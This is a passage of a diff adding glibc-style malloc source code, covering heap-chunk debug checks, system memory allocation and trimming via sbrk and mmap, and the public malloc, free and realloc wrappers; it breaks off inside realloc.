+
+/*
+   Properties of free chunks
+ */
+
+static void
+do_check_free_chunk (mstate av, mchunkptr p)
+{
+  INTERNAL_SIZE_T sz = p->size & ~(PREV_INUSE | NON_MAIN_ARENA);
+  mchunkptr next = chunk_at_offset (p, sz);
+
+  do_check_chunk (av, p);
+
+  /* Chunk must claim to be free ... */
+  assert (!inuse (p));
+  assert (!chunk_is_mmapped (p));
+
+  /* Unless a special marker, must have OK fields */
+  if ((unsigned long) (sz) >= MINSIZE)
+    {
+      assert ((sz & MALLOC_ALIGN_MASK) == 0);
+      assert (aligned_OK (chunk2mem (p)));
+      /* ... matching footer field */
+      assert (next->prev_size == sz);
+      /* ... and is fully consolidated */
+      assert (prev_inuse (p));
+      assert (next == av->top || inuse (next));
+
+      /* ... and has minimally sane links */
+      assert (p->fd->bk == p);
+      assert (p->bk->fd == p);
+    }
+  else /* markers are always of size SIZE_SZ */
+    assert (sz == SIZE_SZ);
+}
+
+/*
+   Properties of inuse chunks
+ */
+
+static void
+do_check_inuse_chunk (mstate av, mchunkptr p)
+{
+  mchunkptr next;
+
+  do_check_chunk (av, p);
+
+  if (chunk_is_mmapped (p))
+    return; /* mmapped chunks have no next/prev */
+
+  /* Check whether it claims to be in use ... */
+  assert (inuse (p));
+
+  next = next_chunk (p);
+
+  /* ... and is surrounded by OK chunks.
+     Since more things can be checked with free chunks than inuse ones,
+     if an inuse chunk borders them and debug is on, it's worth doing them.
+   */
+  if (!prev_inuse (p))
+    {
+      /* Note that we cannot even look at prev unless it is not inuse */
+      mchunkptr prv = prev_chunk (p);
+      assert (next_chunk (prv) == p);
+      do_check_free_chunk (av, prv);
+    }
+
+  if (next == av->top)
+    {
+      assert (prev_inuse (next));
+      assert (chunksize (next) >= MINSIZE);
+    }
+  else if (!inuse (next))
+    do_check_free_chunk (av, next);
+}
+
+/*
+   Properties of chunks recycled from fastbins
+ */
+
+static void
+do_check_remalloced_chunk (mstate av, mchunkptr p, INTERNAL_SIZE_T s)
+{
+  INTERNAL_SIZE_T sz = p->size & ~(PREV_INUSE | NON_MAIN_ARENA);
+
+  if (!chunk_is_mmapped (p))
+    {
+      assert (av == arena_for_chunk (p));
+      if (chunk_non_main_arena (p))
+        assert (av != &main_arena);
+      else
+        assert (av == &main_arena);
+    }
+
+  do_check_inuse_chunk (av, p);
+
+  /* Legal size ... */
+  assert ((sz & MALLOC_ALIGN_MASK) == 0);
+  assert ((unsigned long) (sz) >= MINSIZE);
+  /* ... and alignment */
+  assert (aligned_OK (chunk2mem (p)));
+  /* chunk is less than MINSIZE more than request */
+  assert ((long) (sz) - (long) (s) >= 0);
+  assert ((long) (sz) - (long) (s + MINSIZE) < 0);
+}
+
+/*
+   Properties of nonrecycled chunks at the point they are malloced
+ */
+
+static void
+do_check_malloced_chunk (mstate av, mchunkptr p, INTERNAL_SIZE_T s)
+{
+  /* same as recycled case ... */
+  do_check_remalloced_chunk (av, p, s);
+
+  /*
+     ... plus,  must obey implementation invariant that prev_inuse is
+     always true of any allocated chunk; i.e., that each allocated
+     chunk borders either a previously allocated and still in-use
+     chunk, or the base of its memory arena. This is ensured
+     by making all allocations from the `lowest' part of any found
+     chunk.  This does not necessarily hold however for chunks
+     recycled via fastbins.
+   */
+
+  assert (prev_inuse (p));
+}
+
+
+/*
+   Properties of malloc_state.
+
+   This may be useful for debugging malloc, as well as detecting user
+   programmer errors that somehow write into malloc_state.
+
+   If you are extending or experimenting with this malloc, you can
+   probably figure out how to hack this routine to print out or
+   display chunk addresses, sizes, bins, and other instrumentation.
+ */
+
+static void
+do_check_malloc_state (mstate av)
+{
+  int i;
+  mchunkptr p;
+  mchunkptr q;
+  mbinptr b;
+  unsigned int idx;
+  INTERNAL_SIZE_T size;
+  unsigned long total = 0;
+  int max_fast_bin;
+
+  /* internal size_t must be no wider than pointer type */
+  assert (sizeof (INTERNAL_SIZE_T) <= sizeof (char *));
+
+  /* alignment is a power of 2 */
+  assert ((MALLOC_ALIGNMENT & (MALLOC_ALIGNMENT - 1)) == 0);
+
+  /* cannot run remaining checks until fully initialized */
+  if (av->top == 0 || av->top == initial_top (av))
+    return;
+
+  /* pagesize is a power of 2 */
+  assert (powerof2(GLRO (dl_pagesize)));
+
+  /* A contiguous main_arena is consistent with sbrk_base.  */
+  if (av == &main_arena && contiguous (av))
+    assert ((char *) mp_.sbrk_base + av->system_mem ==
+            (char *) av->top + chunksize (av->top));
+
+  /* properties of fastbins */
+
+  /* max_fast is in allowed range */
+  assert ((get_max_fast () & ~1) <= request2size (MAX_FAST_SIZE));
+
+  max_fast_bin = fastbin_index (get_max_fast ());
+
+  for (i = 0; i < NFASTBINS; ++i)
+    {
+      p = fastbin (av, i);
+
+      /* The following test can only be performed for the main arena.
+         While mallopt calls malloc_consolidate to get rid of all fast
+         bins (especially those larger than the new maximum) this does
+         only happen for the main arena.  Trying to do this for any
+         other arena would mean those arenas have to be locked and
+         malloc_consolidate be called for them.  This is excessive.  And
+         even if this is acceptable to somebody it still cannot solve
+         the problem completely since if the arena is locked a
+         concurrent malloc call might create a new arena which then
+         could use the newly invalid fast bins.  */
+
+      /* all bins past max_fast are empty */
+      if (av == &main_arena && i > max_fast_bin)
+        assert (p == 0);
+
+      while (p != 0)
+        {
+          /* each chunk claims to be inuse */
+          do_check_inuse_chunk (av, p);
+          total += chunksize (p);
+          /* chunk belongs in this bin */
+          assert (fastbin_index (chunksize (p)) == i);
+          p = p->fd;
+        }
+    }
+
+  if (total != 0)
+    assert (have_fastchunks (av));
+  else if (!have_fastchunks (av))
+    assert (total == 0);
+
+  /* check normal bins */
+  for (i = 1; i < NBINS; ++i)
+    {
+      b = bin_at (av, i);
+
+      /* binmap is accurate (except for bin 1 == unsorted_chunks) */
+      if (i >= 2)
+        {
+          unsigned int binbit = get_binmap (av, i);
+          int empty = last (b) == b;
+          if (!binbit)
+            assert (empty);
+          else if (!empty)
+            assert (binbit);
+        }
+
+      for (p = last (b); p != b; p = p->bk)
+        {
+          /* each chunk claims to be free */
+          do_check_free_chunk (av, p);
+          size = chunksize (p);
+          total += size;
+          if (i >= 2)
+            {
+              /* chunk belongs in bin */
+              idx = bin_index (size);
+              assert (idx == i);
+              /* lists are sorted */
+              assert (p->bk == b ||
+                      (unsigned long) chunksize (p->bk) >= (unsigned long) chunksize (p));
+
+              if (!in_smallbin_range (size))
+                {
+                  if (p->fd_nextsize != NULL)
+                    {
+                      if (p->fd_nextsize == p)
+                        assert (p->bk_nextsize == p);
+                      else
+                        {
+                          if (p->fd_nextsize == first (b))
+                            assert (chunksize (p) < chunksize (p->fd_nextsize));
+                          else
+                            assert (chunksize (p) > chunksize (p->fd_nextsize));
+
+                          if (p == first (b))
+                            assert (chunksize (p) > chunksize (p->bk_nextsize));
+                          else
+                            assert (chunksize (p) < chunksize (p->bk_nextsize));
+                        }
+                    }
+                  else
+                    assert (p->bk_nextsize == NULL);
+                }
+            }
+          else if (!in_smallbin_range (size))
+            assert (p->fd_nextsize == NULL && p->bk_nextsize == NULL);
+          /* chunk is followed by a legal chain of inuse chunks */
+          for (q = next_chunk (p);
+               (q != av->top && inuse (q) &&
+                (unsigned long) (chunksize (q)) >= MINSIZE);
+               q = next_chunk (q))
+            do_check_inuse_chunk (av, q);
+        }
+    }
+
+  /* top chunk is OK */
+  check_chunk (av, av->top);
+}
+#endif
+
+
+/* ----------------- Support for debugging hooks -------------------- */
+#include "hooks.c"
+
+
+/* ----------- Routines dealing with system allocation -------------- */
+
+/*
+   sysmalloc handles malloc cases requiring more memory from the system.
+   On entry, it is assumed that av->top does not have enough
+   space to service request for nb bytes, thus requiring that av->top
+   be extended or replaced.
+ */
+
+static void *
+sysmalloc (INTERNAL_SIZE_T nb, mstate av)
+{
+  mchunkptr old_top;              /* incoming value of av->top */
+  INTERNAL_SIZE_T old_size;       /* its size */
+  char *old_end;                  /* its end address */
+
+  long size;                      /* arg to first MORECORE or mmap call */
+  char *brk;                      /* return value from MORECORE */
+
+  long correction;                /* arg to 2nd MORECORE call */
+  char *snd_brk;                  /* 2nd return val */
+
+  INTERNAL_SIZE_T front_misalign; /* unusable bytes at front of new space */
+  INTERNAL_SIZE_T end_misalign;   /* partial page left at end of new space */
+  char *aligned_brk;              /* aligned offset into brk */
+
+  mchunkptr p;                    /* the allocated/returned chunk */
+  mchunkptr remainder;            /* remainder from allocation */
+  unsigned long remainder_size;   /* its size */
+
+
+  size_t pagesize = GLRO (dl_pagesize);
+  bool tried_mmap = false;
+
+
+  /*
+     If have mmap, and the request size meets the mmap threshold, and
+     the system supports mmap, and there are few enough currently
+     allocated mmapped regions, try to directly map this request
+     rather than expanding top.
+   */
+
+  if (av == NULL
+      || ((unsigned long) (nb) >= (unsigned long) (mp_.mmap_threshold)
+	  && (mp_.n_mmaps < mp_.n_mmaps_max)))
+    {
+      char *mm;           /* return value from mmap call*/
+
+    try_mmap:
+      /*
+         Round up size to nearest page.  For mmapped chunks, the overhead
+         is one SIZE_SZ unit larger than for normal chunks, because there
+         is no following chunk whose prev_size field could be used.
+
+         See the front_misalign handling below, for glibc there is no
+         need for further alignments unless we have have high alignment.
+       */
+      if (MALLOC_ALIGNMENT == 2 * SIZE_SZ)
+        size = ALIGN_UP (nb + SIZE_SZ, pagesize);
+      else
+        size = ALIGN_UP (nb + SIZE_SZ + MALLOC_ALIGN_MASK, pagesize);
+      tried_mmap = true;
+
+      /* Don't try if size wraps around 0 */
+      if ((unsigned long) (size) > (unsigned long) (nb))
+        {
+          mm = (char *) (MMAP (0, size, PROT_READ | PROT_WRITE, 0));
+
+          if (mm != MAP_FAILED)
+            {
+              /*
+                 The offset to the start of the mmapped region is stored
+                 in the prev_size field of the chunk. This allows us to adjust
+                 returned start address to meet alignment requirements here
+                 and in memalign(), and still be able to compute proper
+                 address argument for later munmap in free() and realloc().
+               */
+
+              if (MALLOC_ALIGNMENT == 2 * SIZE_SZ)
+                {
+                  /* For glibc, chunk2mem increases the address by 2*SIZE_SZ and
+                     MALLOC_ALIGN_MASK is 2*SIZE_SZ-1.  Each mmap'ed area is page
+                     aligned and therefore definitely MALLOC_ALIGN_MASK-aligned.  */
+                  assert (((INTERNAL_SIZE_T) chunk2mem (mm) & MALLOC_ALIGN_MASK) == 0);
+                  front_misalign = 0;
+                }
+              else
+                front_misalign = (INTERNAL_SIZE_T) chunk2mem (mm) & MALLOC_ALIGN_MASK;
+              if (front_misalign > 0)
+                {
+                  correction = MALLOC_ALIGNMENT - front_misalign;
+                  p = (mchunkptr) (mm + correction);
+                  p->prev_size = correction;
+                  set_head (p, (size - correction) | IS_MMAPPED);
+                }
+              else
+                {
+                  p = (mchunkptr) mm;
+                  set_head (p, size | IS_MMAPPED);
+                }
+
+              /* update statistics */
+
+              int new = atomic_exchange_and_add (&mp_.n_mmaps, 1) + 1;
+              atomic_max (&mp_.max_n_mmaps, new);
+
+              unsigned long sum;
+              sum = atomic_exchange_and_add (&mp_.mmapped_mem, size) + size;
+              atomic_max (&mp_.max_mmapped_mem, sum);
+
+              check_chunk (av, p);
+
+              return chunk2mem (p);
+            }
+        }
+    }
+
+  /* There are no usable arenas and mmap also failed.  */
+  if (av == NULL)
+    return 0;
+
+  /* Record incoming configuration of top */
+
+  old_top = av->top;
+  old_size = chunksize (old_top);
+  old_end = (char *) (chunk_at_offset (old_top, old_size));
+
+  brk = snd_brk = (char *) (MORECORE_FAILURE);
+
+  /*
+     If not the first time through, we require old_size to be
+     at least MINSIZE and to have prev_inuse set.
+   */
+
+  assert ((old_top == initial_top (av) && old_size == 0) ||
+          ((unsigned long) (old_size) >= MINSIZE &&
+           prev_inuse (old_top) &&
+           ((unsigned long) old_end & (pagesize - 1)) == 0));
+
+  /* Precondition: not enough current space to satisfy nb request */
+  assert ((unsigned long) (old_size) < (unsigned long) (nb + MINSIZE));
+
+
+  if (av != &main_arena)
+    {
+      heap_info *old_heap, *heap;
+      size_t old_heap_size;
+
+      /* First try to extend the current heap. */
+      old_heap = heap_for_ptr (old_top);
+      old_heap_size = old_heap->size;
+      if ((long) (MINSIZE + nb - old_size) > 0
+          && grow_heap (old_heap, MINSIZE + nb - old_size) == 0)
+        {
+          av->system_mem += old_heap->size - old_heap_size;
+          arena_mem += old_heap->size - old_heap_size;
+          set_head (old_top, (((char *) old_heap + old_heap->size) - (char *) old_top)
+                    | PREV_INUSE);
+        }
+      else if ((heap = new_heap (nb + (MINSIZE + sizeof (*heap)), mp_.top_pad)))
+        {
+          /* Use a newly allocated heap.  */
+          heap->ar_ptr = av;
+          heap->prev = old_heap;
+          av->system_mem += heap->size;
+          arena_mem += heap->size;
+          /* Set up the new top.  */
+          top (av) = chunk_at_offset (heap, sizeof (*heap));
+          set_head (top (av), (heap->size - sizeof (*heap)) | PREV_INUSE);
+
+          /* Setup fencepost and free the old top chunk with a multiple of
+             MALLOC_ALIGNMENT in size. */
+          /* The fencepost takes at least MINSIZE bytes, because it might
+             become the top chunk again later.  Note that a footer is set
+             up, too, although the chunk is marked in use. */
+          old_size = (old_size - MINSIZE) & ~MALLOC_ALIGN_MASK;
+          set_head (chunk_at_offset (old_top, old_size + 2 * SIZE_SZ), 0 | PREV_INUSE);
+          if (old_size >= MINSIZE)
+            {
+              set_head (chunk_at_offset (old_top, old_size), (2 * SIZE_SZ) | PREV_INUSE);
+              set_foot (chunk_at_offset (old_top, old_size), (2 * SIZE_SZ));
+              set_head (old_top, old_size | PREV_INUSE | NON_MAIN_ARENA);
+              _int_free (av, old_top, 1);
+            }
+          else
+            {
+              set_head (old_top, (old_size + 2 * SIZE_SZ) | PREV_INUSE);
+              set_foot (old_top, (old_size + 2 * SIZE_SZ));
+            }
+        }
+      else if (!tried_mmap)
+        /* We can at least try to use to mmap memory.  */
+        goto try_mmap;
+    }
+  else     /* av == main_arena */
+
+
+    { /* Request enough space for nb + pad + overhead */
+      size = nb + mp_.top_pad + MINSIZE;
+
+      /*
+         If contiguous, we can subtract out existing space that we hope to
+         combine with new space. We add it back later only if
+         we don't actually get contiguous space.
+       */
+
+      if (contiguous (av))
+        size -= old_size;
+
+      /*
+         Round to a multiple of page size.
+         If MORECORE is not contiguous, this ensures that we only call it
+         with whole-page arguments.  And if MORECORE is contiguous and
+         this is not first time through, this preserves page-alignment of
+         previous calls. Otherwise, we correct to page-align below.
+       */
+
+      size = ALIGN_UP (size, pagesize);
+
+      /*
+         Don't try to call MORECORE if argument is so big as to appear
+         negative. Note that since mmap takes size_t arg, it may succeed
+         below even if we cannot call MORECORE.
+       */
+
+      if (size > 0)
+        {
+          brk = (char *) (MORECORE (size));
+          LIBC_PROBE (memory_sbrk_more, 2, brk, size);
+        }
+
+      if (brk != (char *) (MORECORE_FAILURE))
+        {
+          /* Call the `morecore' hook if necessary.  */
+          void (*hook) (void) = atomic_forced_read (__after_morecore_hook);
+          if (__builtin_expect (hook != NULL, 0))
+            (*hook)();
+        }
+      else
+        {
+          /*
+             If have mmap, try using it as a backup when MORECORE fails or
+             cannot be used. This is worth doing on systems that have "holes" in
+             address space, so sbrk cannot extend to give contiguous space, but
+             space is available elsewhere.  Note that we ignore mmap max count
+             and threshold limits, since the space will not be used as a
+             segregated mmap region.
+           */
+
+          /* Cannot merge with old top, so add its size back in */
+          if (contiguous (av))
+            size = ALIGN_UP (size + old_size, pagesize);
+
+          /* If we are relying on mmap as backup, then use larger units */
+          if ((unsigned long) (size) < (unsigned long) (MMAP_AS_MORECORE_SIZE))
+            size = MMAP_AS_MORECORE_SIZE;
+
+          /* Don't try if size wraps around 0 */
+          if ((unsigned long) (size) > (unsigned long) (nb))
+            {
+              char *mbrk = (char *) (MMAP (0, size, PROT_READ | PROT_WRITE, 0));
+
+              if (mbrk != MAP_FAILED)
+                {
+                  /* We do not need, and cannot use, another sbrk call to find end */
+                  brk = mbrk;
+                  snd_brk = brk + size;
+
+                  /*
+                     Record that we no longer have a contiguous sbrk region.
+                     After the first time mmap is used as backup, we do not
+                     ever rely on contiguous space since this could incorrectly
+                     bridge regions.
+                   */
+                  set_noncontiguous (av);
+                }
+            }
+        }
+
+      if (brk != (char *) (MORECORE_FAILURE))
+        {
+          if (mp_.sbrk_base == 0)
+            mp_.sbrk_base = brk;
+          av->system_mem += size;
+
+          /*
+             If MORECORE extends previous space, we can likewise extend top size.
+           */
+
+          if (brk == old_end && snd_brk == (char *) (MORECORE_FAILURE))
+            set_head (old_top, (size + old_size) | PREV_INUSE);
+
+          else if (contiguous (av) && old_size && brk < old_end)
+            {
+              /* Oops!  Someone else killed our space..  Can't touch anything.  */
+              malloc_printerr (3, "break adjusted to free malloc space", brk,
+			       av);
+            }
+
+          /*
+             Otherwise, make adjustments:
+
+           * If the first time through or noncontiguous, we need to call sbrk
+              just to find out where the end of memory lies.
+
+           * We need to ensure that all returned chunks from malloc will meet
+              MALLOC_ALIGNMENT
+
+           * If there was an intervening foreign sbrk, we need to adjust sbrk
+              request size to account for fact that we will not be able to
+              combine new space with existing space in old_top.
+
+           * Almost all systems internally allocate whole pages at a time, in
+              which case we might as well use the whole last page of request.
+              So we allocate enough more memory to hit a page boundary now,
+              which in turn causes future contiguous calls to page-align.
+           */
+
+          else
+            {
+              front_misalign = 0;
+              end_misalign = 0;
+              correction = 0;
+              aligned_brk = brk;
+
+              /* handle contiguous cases */
+              if (contiguous (av))
+                {
+                  /* Count foreign sbrk as system_mem.  */
+                  if (old_size)
+                    av->system_mem += brk - old_end;
+
+                  /* Guarantee alignment of first new chunk made from this space */
+
+                  front_misalign = (INTERNAL_SIZE_T) chunk2mem (brk) & MALLOC_ALIGN_MASK;
+                  if (front_misalign > 0)
+                    {
+                      /*
+                         Skip over some bytes to arrive at an aligned position.
+                         We don't need to specially mark these wasted front bytes.
+                         They will never be accessed anyway because
+                         prev_inuse of av->top (and any chunk created from its start)
+                         is always true after initialization.
+                       */
+
+                      correction = MALLOC_ALIGNMENT - front_misalign;
+                      aligned_brk += correction;
+                    }
+
+                  /*
+                     If this isn't adjacent to existing space, then we will not
+                     be able to merge with old_top space, so must add to 2nd request.
+                   */
+
+                  correction += old_size;
+
+                  /* Extend the end address to hit a page boundary */
+                  end_misalign = (INTERNAL_SIZE_T) (brk + size + correction);
+                  correction += (ALIGN_UP (end_misalign, pagesize)) - end_misalign;
+
+                  assert (correction >= 0);
+                  snd_brk = (char *) (MORECORE (correction));
+
+                  /*
+                     If can't allocate correction, try to at least find out current
+                     brk.  It might be enough to proceed without failing.
+
+                     Note that if second sbrk did NOT fail, we assume that space
+                     is contiguous with first sbrk. This is a safe assumption unless
+                     program is multithreaded but doesn't use locks and a foreign sbrk
+                     occurred between our first and second calls.
+                   */
+
+                  if (snd_brk == (char *) (MORECORE_FAILURE))
+                    {
+                      correction = 0;
+                      snd_brk = (char *) (MORECORE (0));
+                    }
+                  else
+                    {
+                      /* Call the `morecore' hook if necessary.  */
+                      void (*hook) (void) = atomic_forced_read (__after_morecore_hook);
+                      if (__builtin_expect (hook != NULL, 0))
+                        (*hook)();
+                    }
+                }
+
+              /* handle non-contiguous cases */
+              else
+                {
+                  if (MALLOC_ALIGNMENT == 2 * SIZE_SZ)
+                    /* MORECORE/mmap must correctly align */
+                    assert (((unsigned long) chunk2mem (brk) & MALLOC_ALIGN_MASK) == 0);
+                  else
+                    {
+                      front_misalign = (INTERNAL_SIZE_T) chunk2mem (brk) & MALLOC_ALIGN_MASK;
+                      if (front_misalign > 0)
+                        {
+                          /*
+                             Skip over some bytes to arrive at an aligned position.
+                             We don't need to specially mark these wasted front bytes.
+                             They will never be accessed anyway because
+                             prev_inuse of av->top (and any chunk created from its start)
+                             is always true after initialization.
+                           */
+
+                          aligned_brk += MALLOC_ALIGNMENT - front_misalign;
+                        }
+                    }
+
+                  /* Find out current end of memory */
+                  if (snd_brk == (char *) (MORECORE_FAILURE))
+                    {
+                      snd_brk = (char *) (MORECORE (0));
+                    }
+                }
+
+              /* Adjust top based on results of second sbrk */
+              if (snd_brk != (char *) (MORECORE_FAILURE))
+                {
+                  av->top = (mchunkptr) aligned_brk;
+                  set_head (av->top, (snd_brk - aligned_brk + correction) | PREV_INUSE);
+                  av->system_mem += correction;
+
+                  /*
+                     If not the first time through, we either have a
+                     gap due to foreign sbrk or a non-contiguous region.  Insert a
+                     double fencepost at old_top to prevent consolidation with space
+                     we don't own. These fenceposts are artificial chunks that are
+                     marked as inuse and are in any case too small to use.  We need
+                     two to make sizes and alignments work out.
+                   */
+
+                  if (old_size != 0)
+                    {
+                      /*
+                         Shrink old_top to insert fenceposts, keeping size a
+                         multiple of MALLOC_ALIGNMENT. We know there is at least
+                         enough space in old_top to do this.
+                       */
+                      old_size = (old_size - 4 * SIZE_SZ) & ~MALLOC_ALIGN_MASK;
+                      set_head (old_top, old_size | PREV_INUSE);
+
+                      /*
+                         Note that the following assignments completely overwrite
+                         old_top when old_size was previously MINSIZE.  This is
+                         intentional. We need the fencepost, even if old_top otherwise gets
+                         lost.
+                       */
+                      chunk_at_offset (old_top, old_size)->size =
+                        (2 * SIZE_SZ) | PREV_INUSE;
+
+                      chunk_at_offset (old_top, old_size + 2 * SIZE_SZ)->size =
+                        (2 * SIZE_SZ) | PREV_INUSE;
+
+                      /* If possible, release the rest. */
+                      if (old_size >= MINSIZE)
+                        {
+                          _int_free (av, old_top, 1);
+                        }
+                    }
+                }
+            }
+        }
+    } /* if (av !=  &main_arena) */
+
+  if ((unsigned long) av->system_mem > (unsigned long) (av->max_system_mem))
+    av->max_system_mem = av->system_mem;
+  check_malloc_state (av);
+
+  /* finally, do the allocation */
+  p = av->top;
+  size = chunksize (p);
+
+  /* check that one of the above allocation paths succeeded */
+  if ((unsigned long) (size) >= (unsigned long) (nb + MINSIZE))
+    {
+      remainder_size = size - nb;
+      remainder = chunk_at_offset (p, nb);
+      av->top = remainder;
+      set_head (p, nb | PREV_INUSE | (av != &main_arena ? NON_MAIN_ARENA : 0));
+      set_head (remainder, remainder_size | PREV_INUSE);
+      check_malloced_chunk (av, p, nb);
+      return chunk2mem (p);
+    }
+
+  /* catch all failure paths */
+  __set_errno (ENOMEM);
+  return 0;
+}
+
+
+/*
+   systrim is an inverse of sorts to sysmalloc.  It gives memory back
+   to the system (via negative arguments to sbrk) if there is unused
+   memory at the `high' end of the malloc pool. It is called
+   automatically by free() when top space exceeds the trim
+   threshold. It is also called by the public malloc_trim routine.  It
+   returns 1 if it actually released any memory, else 0.
+ */
+
+static int
+systrim (size_t pad, mstate av)
+{
+  long top_size;         /* Amount of top-most memory */
+  long extra;            /* Amount to release */
+  long released;         /* Amount actually released */
+  char *current_brk;     /* address returned by pre-check sbrk call */
+  char *new_brk;         /* address returned by post-check sbrk call */
+  size_t pagesize;
+  long top_area;
+
+  pagesize = GLRO (dl_pagesize);
+  top_size = chunksize (av->top);
+
+  top_area = top_size - MINSIZE - 1;
+  if (top_area <= pad)
+    return 0;
+
+  /* Release in pagesize units and round down to the nearest page.  */
+  extra = ALIGN_DOWN(top_area - pad, pagesize);
+
+  if (extra == 0)
+    return 0;
+
+  /*
+     Only proceed if end of memory is where we last set it.
+     This avoids problems if there were foreign sbrk calls.
+   */
+  current_brk = (char *) (MORECORE (0));
+  if (current_brk == (char *) (av->top) + top_size)
+    {
+      /*
+         Attempt to release memory. We ignore MORECORE return value,
+         and instead call again to find out where new end of memory is.
+         This avoids problems if first call releases less than we asked,
+         of if failure somehow altered brk value. (We could still
+         encounter problems if it altered brk in some very bad way,
+         but the only thing we can do is adjust anyway, which will cause
+         some downstream failure.)
+       */
+
+      MORECORE (-extra);
+      /* Call the `morecore' hook if necessary.  */
+      void (*hook) (void) = atomic_forced_read (__after_morecore_hook);
+      if (__builtin_expect (hook != NULL, 0))
+        (*hook)();
+      new_brk = (char *) (MORECORE (0));
+
+      LIBC_PROBE (memory_sbrk_less, 2, new_brk, extra);
+
+      if (new_brk != (char *) MORECORE_FAILURE)
+        {
+          released = (long) (current_brk - new_brk);
+
+          if (released != 0)
+            {
+              /* Success. Adjust top. */
+              av->system_mem -= released;
+              set_head (av->top, (top_size - released) | PREV_INUSE);
+              check_malloc_state (av);
+              return 1;
+            }
+        }
+    }
+  return 0;
+}
+
+static void
+internal_function
+munmap_chunk (mchunkptr p)
+{
+  INTERNAL_SIZE_T size = chunksize (p);
+
+  assert (chunk_is_mmapped (p));
+
+  uintptr_t block = (uintptr_t) p - p->prev_size;
+  size_t total_size = p->prev_size + size;
+  /* Unfortunately we have to do the compilers job by hand here.  Normally
+     we would test BLOCK and TOTAL-SIZE separately for compliance with the
+     page size.  But gcc does not recognize the optimization possibility
+     (in the moment at least) so we combine the two values into one before
+     the bit test.  */
+  if (__builtin_expect (((block | total_size) & (GLRO (dl_pagesize) - 1)) != 0, 0))
+    {
+      malloc_printerr (check_action, "munmap_chunk(): invalid pointer",
+                       chunk2mem (p), NULL);
+      return;
+    }
+
+  atomic_decrement (&mp_.n_mmaps);
+  atomic_add (&mp_.mmapped_mem, -total_size);
+
+  /* If munmap failed the process virtual memory address space is in a
+     bad shape.  Just leave the block hanging around, the process will
+     terminate shortly anyway since not much can be done.  */
+  __munmap ((char *) block, total_size);
+}
+
+#if HAVE_MREMAP
+
+static mchunkptr
+internal_function
+mremap_chunk (mchunkptr p, size_t new_size)
+{
+  size_t pagesize = GLRO (dl_pagesize);
+  INTERNAL_SIZE_T offset = p->prev_size;
+  INTERNAL_SIZE_T size = chunksize (p);
+  char *cp;
+
+  assert (chunk_is_mmapped (p));
+  assert (((size + offset) & (GLRO (dl_pagesize) - 1)) == 0);
+
+  /* Note the extra SIZE_SZ overhead as in mmap_chunk(). */
+  new_size = ALIGN_UP (new_size + offset + SIZE_SZ, pagesize);
+
+  /* No need to remap if the number of pages does not change.  */
+  if (size + offset == new_size)
+    return p;
+
+  cp = (char *) __mremap ((char *) p - offset, size + offset, new_size,
+                          MREMAP_MAYMOVE);
+
+  if (cp == MAP_FAILED)
+    return 0;
+
+  p = (mchunkptr) (cp + offset);
+
+  assert (aligned_OK (chunk2mem (p)));
+
+  assert ((p->prev_size == offset));
+  set_head (p, (new_size - offset) | IS_MMAPPED);
+
+  INTERNAL_SIZE_T new;
+  new = atomic_exchange_and_add (&mp_.mmapped_mem, new_size - size - offset)
+        + new_size - size - offset;
+  atomic_max (&mp_.max_mmapped_mem, new);
+  return p;
+}
+#endif /* HAVE_MREMAP */
+
+/*------------------------ Public wrappers. --------------------------------*/
+
+void *
+__libc_malloc (size_t bytes)
+{
+  mstate ar_ptr;
+  void *victim;
+
+  void *(*hook) (size_t, const void *)
+    = atomic_forced_read (__malloc_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    return (*hook)(bytes, RETURN_ADDRESS (0));
+
+  arena_get (ar_ptr, bytes);
+
+  victim = _int_malloc (ar_ptr, bytes);
+  /* Retry with another arena only if we were able to find a usable arena
+     before.  */
+  if (!victim && ar_ptr != NULL)
+    {
+      LIBC_PROBE (memory_malloc_retry, 1, bytes);
+      ar_ptr = arena_get_retry (ar_ptr, bytes);
+      victim = _int_malloc (ar_ptr, bytes);
+    }
+
+  if (ar_ptr != NULL)
+    (void) mutex_unlock (&ar_ptr->mutex);
+
+  assert (!victim || chunk_is_mmapped (mem2chunk (victim)) ||
+          ar_ptr == arena_for_chunk (mem2chunk (victim)));
+  return victim;
+}
+libc_hidden_def (__libc_malloc)
+
+void
+__libc_free (void *mem)
+{
+  mstate ar_ptr;
+  mchunkptr p;                          /* chunk corresponding to mem */
+
+  void (*hook) (void *, const void *)
+    = atomic_forced_read (__free_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    {
+      (*hook)(mem, RETURN_ADDRESS (0));
+      return;
+    }
+
+  if (mem == 0)                              /* free(0) has no effect */
+    return;
+
+  p = mem2chunk (mem);
+
+  if (chunk_is_mmapped (p))                       /* release mmapped memory. */
+    {
+      /* see if the dynamic brk/mmap threshold needs adjusting */
+      if (!mp_.no_dyn_threshold
+          && p->size > mp_.mmap_threshold
+          && p->size <= DEFAULT_MMAP_THRESHOLD_MAX)
+        {
+          mp_.mmap_threshold = chunksize (p);
+          mp_.trim_threshold = 2 * mp_.mmap_threshold;
+          LIBC_PROBE (memory_mallopt_free_dyn_thresholds, 2,
+                      mp_.mmap_threshold, mp_.trim_threshold);
+        }
+      munmap_chunk (p);
+      return;
+    }
+
+  ar_ptr = arena_for_chunk (p);
+  _int_free (ar_ptr, p, 0);
+}
+libc_hidden_def (__libc_free)
+
+void *
+__libc_realloc (void *oldmem, size_t bytes)
+{
+  mstate ar_ptr;
+  INTERNAL_SIZE_T nb;         /* padded request size */
+
+  void *newp;             /* chunk to return */
+
+  void *(*hook) (void *, size_t, const void *) =
+    atomic_forced_read (__realloc_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    return (*hook)(oldmem, bytes, RETURN_ADDRESS (0));
+
+#if REALLOC_ZERO_BYTES_FREES
+  if (bytes == 0 && oldmem != NULL)
+    {
+      __libc_free (oldmem); return 0;
+    }
+#endif
+
+  /* realloc of null is supposed to be same as malloc */
+  if (oldmem == 0)
+    return __libc_malloc (bytes);
+
+  /* chunk corresponding to oldmem */
+  const mchunkptr oldp = mem2chunk (oldmem);
+  /* its size */
+  const INTERNAL_SIZE_T oldsize = chunksize (oldp);
+
+  if (chunk_is_mmapped (oldp))
+    ar_ptr = NULL;
+  else
+    ar_ptr = arena_for_chunk (oldp);
+
+  /* Little security check which won't hurt performance: the
+     allocator never wrapps around at the end of the address space.
+     Therefore we can exclude some size values which might appear
+     here by accident or by "design" from some intruder.  */
+  if (__builtin_expect ((uintptr_t) oldp > (uintptr_t) -oldsize, 0)
+      || __builtin_expect (misaligned_chunk (oldp), 0))
+    {
+      malloc_printerr (check_action, "realloc(): invalid pointer", oldmem,
+		       ar_ptr);
+      return NULL;
